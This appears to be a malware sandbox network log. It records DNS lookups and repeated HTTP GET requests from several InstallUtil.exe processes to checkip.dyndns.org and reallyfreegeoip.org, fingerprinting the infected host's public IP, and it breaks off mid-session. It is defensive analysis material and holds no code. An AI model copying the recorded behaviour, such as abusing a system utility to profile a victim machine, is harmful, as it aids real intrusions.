                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 26, 2024 09:57:58.490430117 CEST1.1.1.1192.168.2.50xb207No error (0)wymascensores.com67.212.175.162A (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:01.799412966 CEST1.1.1.1192.168.2.50xde13No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                        Sep 26, 2024 09:58:01.799412966 CEST1.1.1.1192.168.2.50xde13No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:01.799412966 CEST1.1.1.1192.168.2.50xde13No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:01.799412966 CEST1.1.1.1192.168.2.50xde13No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:01.799412966 CEST1.1.1.1192.168.2.50xde13No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:01.799412966 CEST1.1.1.1192.168.2.50xde13No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:03.022213936 CEST1.1.1.1192.168.2.50x8260No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:03.022213936 CEST1.1.1.1192.168.2.50x8260No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • wymascensores.com
                        • reallyfreegeoip.org
                        • checkip.dyndns.org

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549705158.101.44.242805500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:01.812444925 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:02.655642986 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:02 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 39bdfde6e7a2dc714fffd4ed7b7eb7b1
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:02.692636013 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:02.870244980 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:02 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: e39303457c3435230307704359d429d9
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:03.704962969 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:03.895771980 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:03 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: a19912bb6b1fd66d8a37d13769df3cf2
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549708158.101.44.242805500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:04.512077093 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:06.908375025 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:06 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 9667b3a12271bf0f69fa6ae62ed4ebdf
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.549710158.101.44.242805500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:07.558267117 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:11.386081934 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:11 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: bfdf0eed64a153e0986012b0a5a45f25
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.549713158.101.44.242805500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:11.986128092 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:12.744321108 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:12 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 44626f9d7035c1dd63e5659275210f88
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.549715158.101.44.242805500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:13.495141983 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:15.432420015 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:15 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 165a315d36c153ce8f8ef54c216a0c28
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.549719158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:15.178100109 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:16.910166025 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:16 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 39401da3c3c75e0cb9602538bc0f4db0
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:16.914083958 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:17.216331959 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:17 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 1906789b59e6d6f3768d2c3a7c6e881c
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:17.879894972 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:18.033339977 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:17 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 33ff2b72b61387faa9bd5905ab3a6fba
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.549724158.101.44.242805500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:16.123888016 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:19.067699909 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:18 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: ebc756fdd90a8047d174a89ad89d34ad
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.549729158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:18.754442930 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:19.340846062 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:19 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 5f37fc886b406ac17930d056169a0c9a
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.549733158.101.44.242805500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:19.672642946 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:20.511933088 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:20 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: b53e50554dba06bfc1d6d1e98a1c5b8e
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.549734158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:19.986964941 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:20.558346033 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:20 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: eb68d1e4f7e67b310f37fc8869d64895
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.549737158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:21.351094961 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:23.454595089 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:23 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 332862dfb5b51b5acdb292bb0e6c7e32
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.549738158.101.44.242805780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:22.737683058 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:24.346460104 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:24 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 6ac9f45b786a0ac9a513b18249eab7ae
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:24.350236893 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:24.740381956 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:24 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 05aadb28d120820584bd95bbe2311936
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:25.488765955 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:25.640572071 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:25 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 315f1c894e074f2c9a5041957c4af524
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.549740158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:24.098526955 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:24.670777082 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:24 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: a6a9d2e2d53e4bf17b85e0b816b20a68
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.549743158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:25.325973034 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:25.918742895 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:25 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: d6e2b26d1fe2b68ff33b7a3368482419
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.549746158.101.44.242805780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:26.581479073 CEST127OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:27.152457952 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:27 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: e578b55265b262c57941484dc17f2b2c
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.549747158.101.44.242803176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:26.582603931 CEST151OUTGET / HTTP/1.1
